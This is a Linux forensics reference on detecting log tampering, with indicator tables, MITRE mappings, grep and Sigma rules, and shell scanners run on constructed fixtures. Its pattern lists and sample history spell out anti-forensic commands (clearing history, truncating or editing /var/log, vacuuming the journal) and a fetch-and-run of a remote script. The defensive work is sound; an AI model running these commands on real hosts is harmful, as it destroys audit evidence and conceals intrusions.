This note documents detection patterns related to Log Tampering and Cleanup on Linux systems.
Direct Indicators
| Source | Grep Pattern / Artifact | Meaning | Forensic Value | Notes |
|---|---|---|---|---|
| Shell history | history -c | Interactive history clear | Critical | Classic immediate cleanup action. |
| Shell history | unset HISTFILE | Disable history logging | Critical | Strong anti-forensic intent. |
| Shell history | rm ~/.bash_history | Delete shell history | Critical | Direct anti-forensic action. |
| Shell history | echo > ~/.bash_history | Truncate history | Critical | Common cleanup shortcut. |
| Shell history | truncate -s 0 | File zeroing | Critical | Broader anti-forensic pattern. |
| Shell history | sed -i on logs | Selective line removal | Critical | Precise cleanup attempt. |
| Shell history | rm /var/log/... | Log deletion | Critical | High-confidence anti-forensics. |
| Shell history | journalctl --vacuum | Journal cleanup | Critical | Direct journal tampering; vacuum removes archived journal files only, so the active journal file may still hold the window. |
| Shell history | > /var/log/auth.log | Auth log truncation | Critical | Strong malicious cleanup. |
| File size anomaly | log suddenly tiny / empty | Cleanup artifact | Critical | Strong timeline clue. |
| File timestamp | recent log touch | Cleanup timing anchor | Critical | Correlates with intrusion. |
| Missing rotated logs | abnormal rotation gap (e.g. .1 and .3 present, .2 missing) | Rotated log deleted | High | Suggests deletion of history the attacker could not edit in place. |
| auditd | write/delete records for log or history paths (SYSCALL + PATH) | Process attribution (pid, auid, exe, tty) | Critical | Best truth source if enabled. |
| Journald gap | missing expected entries or boots | Journal purged or truncated | High | Strong anti-forensic clue. |
Indirect Indicators
| Indicator | What To Look For | Forensic Value | Notes |
|---|---|---|---|
| History missing after active shell | Selective cleanup | Critical | Strong operator signal. |
| Auth log gap during compromise | Log tampering | Critical | Important timeline clue. |
| Only specific lines removed | Targeted anti-forensics | Critical | Mature operator behavior. |
| Logs cleared after sudo or persistence | Cover-up sequence | Critical | Strong hostile chain. |
| History disabled before actions | Intentional stealth | Critical | High-value intent evidence. |
| Journald vacuum after intrusion | Journal anti-forensics | Critical | Strong cleanup signal. |
| Temp payload deleted plus logs altered | Full cleanup discipline | Critical | Mature operator pattern. |
| Shell history recreated empty | Manual reset | High | Common cleanup artifact. |
| File inode persists but size zero | Truncation | High | Useful forensic clue. |
| Logs missing but other artifacts remain | Partial cleanup | High | Common real-world outcome. |
Common Tools
| Tool | Usage |
|---|---|
| history -c | Clear shell history. |
| unset HISTFILE | Disable history writes. |
| rm | Delete logs/history. |
| truncate | Zero files. |
| sed -i | Selective line deletion. |
| journalctl --vacuum-* | Journal cleanup (archived journal files only). |
Relevant Artifacts
| Artifact | Path / Command | Forensic Value | Notes |
|---|---|---|---|
| Shell history | .bash_history, .zsh_history | Critical | Primary anti-forensic target. |
| Auth logs | /var/log/auth.log, /var/log/secure | Critical | Common cleanup target. |
| Syslog | /var/log/syslog, /var/log/messages | Critical | Secondary target. |
| Journal | /var/log/journal/ | Critical | Journald persistence. |
| Rotated logs | /var/log/*.1, .gz | Critical | Compare for gaps. |
| Audit logs | /var/log/audit/audit.log | Critical | Often survives if enabled. |
| File metadata | stat | Critical | Timestamp truth. |
MITRE ATT&CK References
- T1070 Indicator Removal (formerly Indicator Removal on Host)
- T1070.003 Clear Command History
- T1070.002 Clear Linux or Mac System Logs
Decision Tree
- Are logs/history altered?
  - Inspect size, timestamps, missing content.
- Which logs were targeted?
  - History, auth, syslog, journal.
- Was cleanup broad or selective?
  - Full deletion vs line edits.
- What survives elsewhere?
  - Rotated logs, auditd, copies held off-host (central collector, other hosts the session touched).
- Did cleanup follow compromise actions?
  - Sequence matters strongly.
- Pivot
  - Timestamp → intrusion chain.
  - Missing logs → alternate sources.
  - File metadata → tamper timing.
- Confirm anti-forensics
  - Cleanup commands + altered logs + intrusion context = strong anti-forensic finding.
Example Detection Templates
Grep
grep "history -c\|unset HISTFILE\|rm ~/.bash_history\|truncate -s 0\|journalctl --vacuum" /home/*/.bash_history /root/.bash_history 2>/dev/null
grep "rm /var/log\|> /var/log\|sed -i" /home/*/.bash_history /root/.bash_history 2>/dev/null
ls -lh /var/log/auth.log /var/log/syslog /var/log/secure 2>/dev/null
Expect few hits for history -c and unset HISTFILE in the history file itself: bash writes .bash_history at shell exit from the in-memory list, so history -c removes itself and a session that ran unset HISTFILE is usually missing as a whole. Those commands surface in per-command appended history (PROMPT_COMMAND='history -a'), auditd execve records, or central shell logging. The sed -i pattern on its own is noisy; treat it as a hit only when the edited path is a log or history file.
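Running those greps by hand is fine for one host; for a fleet, or for a command stream exported from auditd or a central shell logger, a scanner that labels each hit is more useful. The following is an added example, not part of the original note: a POSIX shell function that applies the cleanup patterns from this page (plus the HISTFILE=/dev/null and HISTSIZE=0 variants) to any one-command-per-line file and prints file:line:label:command. The sample history it scans is constructed for the demo and represents what a central shell logger or an auditd execve feed would capture; a local .bash_history of such a session would usually be missing entirely, because bash writes the file at exit and HISTFILE was unset by then. The pattern list and labels are choices made for this example, not a vetted ruleset, and the zsh extended-history prefix (": epoch:0;") is tolerated by the leading-separator anchors.

```shell
#!/bin/sh
# Added example, not from the original note. Scans one-command-per-line files
# (.bash_history, .zsh_history, or an exported command stream) for
# log-tampering commands and labels every hit with the ATT&CK mapping.

# regex::label, one per line, ERE syntax. Chosen for this example; tune locally.
CLEANUP_PATTERNS='
(^|[;&| ])history -c([; &|]|$)::clear in-memory history (T1070.003)
unset HISTFILE::disable history file (T1070.003)
HISTFILE=/dev/null::redirect history to /dev/null (T1070.003)
HIST(FILE)?SIZE=0::set history size to zero (T1070.003)
rm (-[a-zA-Z]+ )*(~|\$HOME|/root|/home/[^ /]+)/\.(bash|zsh)_history::delete shell history (T1070.003)
(^|[;&| ])>[ ]*(~|\$HOME|/root|/home/[^ /]+)/\.(bash|zsh)_history::truncate shell history (T1070.003)
(^|[;&| ])>[ ]*/var/log/::truncate a system log (T1070.002)
rm (-[a-zA-Z]+ )*/var/log/::delete a system log (T1070.002)
shred (-[a-zA-Z]+ )*/var/log/::shred a system log (T1070.002)
sed -i.*/var/log/::edit a system log in place (T1070.002)
truncate (-s ?|--size[= ])0([ ;&|]|$)::zero a file (T1070)
journalctl --vacuum::purge the journal (T1070.002)
'

# Print "file:lineno:label:command" for every matching line. A line that
# chains two techniques (unset HISTFILE; rm ~/.bash_history) is reported twice.
scan_history() {    # usage: scan_history FILE...
  for f in "$@"; do
    [ -r "$f" ] || continue
    printf '%s\n' "$CLEANUP_PATTERNS" | while IFS= read -r entry; do
      [ -n "$entry" ] || continue
      regex=${entry%%::*}
      label=${entry#*::}
      grep -nE -- "$regex" "$f" 2>/dev/null | while IFS= read -r hit; do
        printf '%s:%s:%s:%s\n' "$f" "${hit%%:*}" "$label" "${hit#*:}"
      done
    done
  done | sort -t: -k1,1 -k2,2n
}

# Constructed sample command stream for the demo (not real data).
SAMPLE_HISTORY=$(mktemp)
trap 'rm -f "$SAMPLE_HISTORY"' EXIT
cat > "$SAMPLE_HISTORY" <<'EOF'
cd /tmp
wget http://192.0.2.10/x.sh
chmod +x x.sh
./x.sh
sudo -i
unset HISTFILE
truncate -s 0 /var/log/wtmp
sed -i '/192.0.2.10/d' /var/log/auth.log
> /var/log/syslog
journalctl --vacuum-time=1s
rm -f /tmp/x.sh
rm ~/.bash_history
history -c
ls -la
EOF

scan_history "$SAMPLE_HISTORY"
```

Point it at /home/*/.bash_history and /root/.bash_history on the host, or at an export of auditd EXECVE records, and read the hits in line order: the page's "history disabled before actions" and "logs cleared after sudo or persistence" sequences are visible directly in the line numbers.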
Journalctl
journalctl --list-boots
journalctl | tail
Compare the boot list and the oldest surviving entry against the configured retention: a journal that starts far later than expected, or whose disk usage (journalctl --disk-usage) is far below the retention limit, points at a vacuum; journalctl --verify flags journal files that were truncated or edited rather than rotated.
File Inspection
stat /home/*/.bash_history /root/.bash_history 2>/dev/null
find /var/log -type f -printf '%TY-%Tm-%Td %TT %s %p\n' 2>/dev/null | sort
Use explicit home paths rather than ~, which expands to the investigator's own home. stat also prints the inode: an active log with its original inode but zero size was truncated in place; a new inode with a fresh birth time means it was deleted and recreated.
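The size and timestamp checks above are the ones worth automating. The following is an added example, not part of the original note: two POSIX shell functions, one that reports holes in the logrotate numbering (BASE.1 and BASE.3 present but BASE.2 gone) and one that flags an active log that is empty yet was recreated long after its latest rotation, which separates a `> /var/log/auth.log` from a fresh rotation that also leaves an empty file. It runs against a constructed directory built with mktemp and assumes GNU coreutils (stat -c, touch -d @epoch). Dateext-style names (auth.log-20240101) are not handled, and the 600-second threshold is a starting guess to tune per host.

```shell
#!/bin/sh
# Added example, not from the original note. Checks for the "missing rotated
# logs" and "log suddenly empty" indicators against a constructed directory.
# Assumes GNU coreutils (stat -c, touch -d @EPOCH).

# Print BASE.N for every rotation number missing between 1 and the highest
# BASE.N or BASE.N.gz present. logrotate numbers rotations contiguously, so a
# hole normally means a file was removed by hand.
rotation_gaps() {   # usage: rotation_gaps DIR BASE
  dir=$1; base=$2
  nums=$(for p in "$dir/$base".[0-9]*; do
           [ -e "$p" ] || continue
           n=${p#"$dir/$base".}; printf '%s\n' "${n%%.*}"
         done | sort -n)
  [ -n "$nums" ] || return 0
  max=$(printf '%s\n' "$nums" | tail -n 1)
  i=1
  while [ "$i" -le "$max" ]; do
    printf '%s\n' "$nums" | grep -qx "$i" || printf '%s.%s\n' "$base" "$i"
    i=$((i + 1))
  done
}

# Print BASE for active logs that are empty and whose mtime is more than
# TRUNC_GAP_SECS after the newest rotation. A fresh logrotate also leaves an
# empty file, but its mtime sits within seconds of BASE.1's; a later
# "> BASE" does not, and keeps the original inode (check with stat %i).
truncated_logs() {  # usage: truncated_logs DIR BASE...
  dir=$1; shift
  for base in "$@"; do
    active="$dir/$base"
    [ -f "$active" ] || continue
    prev=""
    [ -f "$dir/$base.1" ] && prev="$dir/$base.1"
    [ -z "$prev" ] && [ -f "$dir/$base.1.gz" ] && prev="$dir/$base.1.gz"
    [ -n "$prev" ] || continue
    size=$(stat -c %s "$active")
    gap=$(( $(stat -c %Y "$active") - $(stat -c %Y "$prev") ))
    if [ "$size" -eq 0 ] && [ "$gap" -gt "${TRUNC_GAP_SECS:-600}" ]; then
      printf '%s\n' "$base"
    fi
  done
}

# Constructed fixture (not a real /var/log). Epoch mtimes are arbitrary.
FIXTURE=$(mktemp -d)
trap 'rm -rf "$FIXTURE"' EXIT
# auth.log: emptied three hours after the last rotation, and .2 is gone.
: > "$FIXTURE/auth.log";                   touch -d @1700010800 "$FIXTURE/auth.log"
echo 'old auth 1' > "$FIXTURE/auth.log.1"; touch -d @1700000000 "$FIXTURE/auth.log.1"
echo 'old auth 3' > "$FIXTURE/auth.log.3.gz"   # only the name matters here
echo 'old auth 4' > "$FIXTURE/auth.log.4.gz"
# kern.log: a normal rotation, empty active file created a minute after it.
: > "$FIXTURE/kern.log";                   touch -d @1700000060 "$FIXTURE/kern.log"
echo 'old kern 1' > "$FIXTURE/kern.log.1"; touch -d @1700000000 "$FIXTURE/kern.log.1"
# syslog: healthy and still receiving writes.
echo 'live' > "$FIXTURE/syslog"
echo 'old syslog 1' > "$FIXTURE/syslog.1"
echo 'old syslog 2' > "$FIXTURE/syslog.2.gz"

for b in auth.log kern.log syslog; do rotation_gaps "$FIXTURE" "$b"; done
truncated_logs "$FIXTURE" auth.log kern.log syslog
```

Against a real host replace FIXTURE with /var/log and pass the bases you care about (auth.log, secure, syslog, messages, wtmp); run both checks before touching anything else, since any write to the directory shifts the timestamps you are reasoning about.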
Sigma
title: Linux Log Tampering and Cleanup
id: linux-log-tampering-cleanup   # replace with a UUID; the Sigma specification requires one
status: experimental
description: Detects suspicious commands and artifacts associated with Linux anti-forensic cleanup
logsource:
    product: linux
detection:
    selection_keywords:
        message|contains:
            - 'history -c'
            - 'unset HISTFILE'
            - 'truncate -s 0'
            - 'journalctl --vacuum'
            - 'rm /var/log'
            - '> /var/log/'
    condition: selection_keywords
fields:
    - message
    - hostname
falsepositives:
    - Rare legitimate cleanup activity
    - Scheduled housekeeping scripts that truncate or vacuum logs
level: high
tags:
    - attack.defense_evasion
    - attack.t1070
    - attack.t1070.002
    - attack.t1070.003
The message field assumes a syslog-style source (auditd or shell logging forwarded as text). For a process_creation source the equivalent field is CommandLine, and 'sed -i' is deliberately left out of the keyword list because it fires on ordinary administration.
Mitigation & Hardening
| Control Area | Mitigation | Effectiveness | Notes |
|---|---|---|---|
| Central logging | Forward logs remotely | Critical | Prevents local-only cleanup success. |
| Auditd | Preserve command and file actions | Critical | Strong anti-forensic resilience. |
| Log immutability | Protect critical logs | High | Limits tampering; append-only attributes (chattr +a) slow a root attacker down but can be removed with the same privilege, so the off-host copy is the real control. |
| Shell logging | Central shell command capture | High | Survives local history deletion. |
| Rotation monitoring | Detect abnormal gaps | High | Strong invariant clue. |
Fast Triage Checks
| Question | Command / Artifact | Why It Matters |
|---|---|---|
| Is history empty unexpectedly? | inspect history files | Immediate anti-forensic clue. |
| Were logs truncated? | size + timestamps | Strong tamper signal. |
| Are rotated logs missing? | inspect older logs | Gap detection. |
| Did journal shrink recently? | journal metadata | Cleanup clue. |
| Does auditd preserve truth? | inspect audit logs | Alternate truth source. |
| What action preceded cleanup? | surviving timeline | Attack reconstruction. |
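When auditd was watching the log and history paths (the Auditd row in the mitigation table), the audit trail answers "what action preceded cleanup" with a pid, a login uid and a tty. On a live host the tool is ausearch -k KEY -i; the following is an added example, not from the original note, for a raw audit.log pulled off the box: a POSIX shell wrapper around awk that joins the SYSCALL and PATH records of each keyed event by serial number and prints who did what to which path, marking events from an interactive session (auid set, tty present) separately from daemon activity such as logrotate. The key name logtamper and the watch rules in the comment are assumptions for this example, the sample audit records are constructed and trimmed to the fields the parser needs, and the syscall-number table is the x86_64 one (ausearch -i is the authoritative decoder).

```shell
#!/bin/sh
# Added example, not from the original note. Attributes keyed auditd events
# to a process and session. Assumed rules in /etc/audit/rules.d/ (key name is
# hypothetical):
#   -w /var/log/ -p wa -k logtamper          (directory watch; narrow it on busy hosts)
#   -w /root/.bash_history -p wa -k logtamper

# Print one line per keyed event: timestamp, serial, session type, identity,
# process, decoded syscall, and the non-parent PATH entries with their nametype.
audit_tamper_events() {   # usage: audit_tamper_events AUDIT_LOG [KEY]
  awk -v want="${2:-logtamper}" '
  # value of " name=..." in s, quoted or bare; the leading space keeps uid
  # from matching inside auid/euid/fsuid.
  function field(s, name,   v) {
    if (match(s, " " name "=\"[^\"]*\"")) {
      v = substr(s, RSTART, RLENGTH); sub(/^ [^=]*="/, "", v); sub(/"$/, "", v); return v
    }
    if (match(s, " " name "=[^ ]*")) {
      v = substr(s, RSTART, RLENGTH); sub(/^ [^=]*=/, "", v); return v
    }
    return ""
  }
  BEGIN {   # x86_64 syscall numbers relevant to log tampering
    sc[2]="open"; sc[76]="truncate"; sc[77]="ftruncate"; sc[82]="rename"
    sc[87]="unlink"; sc[257]="openat"; sc[263]="unlinkat"; sc[264]="renameat"
  }
  {
    if (!match($0, /msg=audit\([0-9.]+:[0-9]+\)/)) next
    split(substr($0, RSTART + 10, RLENGTH - 11), p, ":")   # "ts:serial"
    ts = p[1]; serial = p[2]
    line = " " $0
    t = field(line, "type")
    if (t == "SYSCALL") {
      if (field(line, "key") != want) next
      seen[serial] = 1; when[serial] = ts
      inter[serial] = (field(line, "auid") != "4294967295" && field(line, "tty") != "(none)") ? "interactive" : "non-interactive"
      who[serial] = "auid=" field(line, "auid") " uid=" field(line, "uid") " tty=" field(line, "tty") " ses=" field(line, "ses")
      n = field(line, "syscall") + 0
      what[serial] = field(line, "comm") " (" field(line, "exe") ") " ((n in sc) ? sc[n] : "syscall#" n)
    } else if (t == "PATH") {
      nt = field(line, "nametype")
      if (nt == "PARENT") next
      sep = (serial in paths) ? "," : ""
      paths[serial] = paths[serial] sep field(line, "name") "[" nt "]"
    }
  }
  END {
    for (s in seen) printf "%s serial=%s session=%s %s %s %s\n", when[s], s, inter[s], who[s], what[s], paths[s]
  }' "$1" | sort -k1,1n
}

# Constructed sample audit.log (fields trimmed; not real data): an interactive
# root shell truncating auth.log and deleting its history, an unkeyed sshd
# event, and a scheduled logrotate rename that also carries the key.
SAMPLE_AUDIT=$(mktemp)
trap 'rm -f "$SAMPLE_AUDIT"' EXIT
cat > "$SAMPLE_AUDIT" <<'EOF'
type=SYSCALL msg=audit(1700010800.101:2201): arch=c000003e syscall=257 success=yes exit=3 items=2 ppid=1422 pid=1510 auid=1000 uid=0 gid=0 euid=0 tty=pts0 ses=4 comm="bash" exe="/usr/bin/bash" key="logtamper"
type=CWD msg=audit(1700010800.101:2201): cwd="/root"
type=PATH msg=audit(1700010800.101:2201): item=0 name="/var/log/" inode=131073 dev=fd:01 mode=040755 ouid=0 ogid=0 nametype=PARENT
type=PATH msg=audit(1700010800.101:2201): item=1 name="/var/log/auth.log" inode=131105 dev=fd:01 mode=0100640 ouid=0 ogid=4 nametype=NORMAL
type=PROCTITLE msg=audit(1700010800.101:2201): proctitle="bash"
type=SYSCALL msg=audit(1700010900.555:2230): arch=c000003e syscall=263 success=yes exit=0 items=2 ppid=1510 pid=1533 auid=1000 uid=0 gid=0 euid=0 tty=pts0 ses=4 comm="rm" exe="/usr/bin/rm" key="logtamper"
type=CWD msg=audit(1700010900.555:2230): cwd="/root"
type=PATH msg=audit(1700010900.555:2230): item=0 name="/root/" inode=262145 dev=fd:01 mode=040700 ouid=0 ogid=0 nametype=PARENT
type=PATH msg=audit(1700010900.555:2230): item=1 name="/root/.bash_history" inode=262501 dev=fd:01 mode=0100600 ouid=0 ogid=0 nametype=DELETE
type=PROCTITLE msg=audit(1700010900.555:2230): proctitle=726D002F726F6F742F2E626173685F686973746F7279
type=SYSCALL msg=audit(1700011200.007:2260): arch=c000003e syscall=59 success=yes exit=0 items=2 ppid=1 pid=1601 auid=4294967295 uid=0 gid=0 euid=0 tty=(none) ses=4294967295 comm="sshd" exe="/usr/sbin/sshd" key=(null)
type=SYSCALL msg=audit(1700038800.212:2305): arch=c000003e syscall=82 success=yes exit=0 items=4 ppid=1640 pid=1642 auid=4294967295 uid=0 gid=0 euid=0 tty=(none) ses=4294967295 comm="logrotate" exe="/usr/sbin/logrotate" key="logtamper"
type=CWD msg=audit(1700038800.212:2305): cwd="/"
type=PATH msg=audit(1700038800.212:2305): item=0 name="/var/log/" inode=131073 dev=fd:01 mode=040755 ouid=0 ogid=0 nametype=PARENT
type=PATH msg=audit(1700038800.212:2305): item=1 name="/var/log/" inode=131073 dev=fd:01 mode=040755 ouid=0 ogid=0 nametype=PARENT
type=PATH msg=audit(1700038800.212:2305): item=2 name="/var/log/auth.log" inode=131105 dev=fd:01 mode=0100640 ouid=0 ogid=4 nametype=DELETE
type=PATH msg=audit(1700038800.212:2305): item=3 name="/var/log/auth.log.1" inode=131105 dev=fd:01 mode=0100640 ouid=0 ogid=4 nametype=CREATE
type=PROCTITLE msg=audit(1700038800.212:2305): proctitle="/usr/sbin/logrotate /etc/logrotate.conf"
EOF

audit_tamper_events "$SAMPLE_AUDIT"
```

The interactive/non-interactive split is the part that matters in triage: the logrotate rename carries the same key and touches the same inode as the truncation, but with auid unset and no tty it is housekeeping, while the two pts0 events under auid 1000 give the login account to pivot on even though uid is 0 after sudo.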
High Value Grep Strings
| Pattern | Why It Matters |
|---|---|
| history -c | Direct shell cleanup. |
| unset HISTFILE | Disable future history. |
| rm ~/.bash_history | Delete shell history. |
| truncate -s 0 | Zero file content. |
| journalctl --vacuum | Journal cleanup. |
| sed -i | Selective deletion; noisy alone, count it only with a log or history path on the same line. |
| > /var/log/ | Direct truncation. |
Analyst Notes
| Scenario | Interpretation |
|---|---|
| Empty history after active compromise | Strong cleanup signal. |
| Auth log suddenly tiny | Likely truncation. |
| Journald gap after intrusion | Anti-forensic attempt likely. |
| Specific lines removed | Mature operator cleanup. |
| Logs cleaned but known_hosts remains | Partial cleanup common. |
| History deleted but audit survives | Auditd becomes decisive. |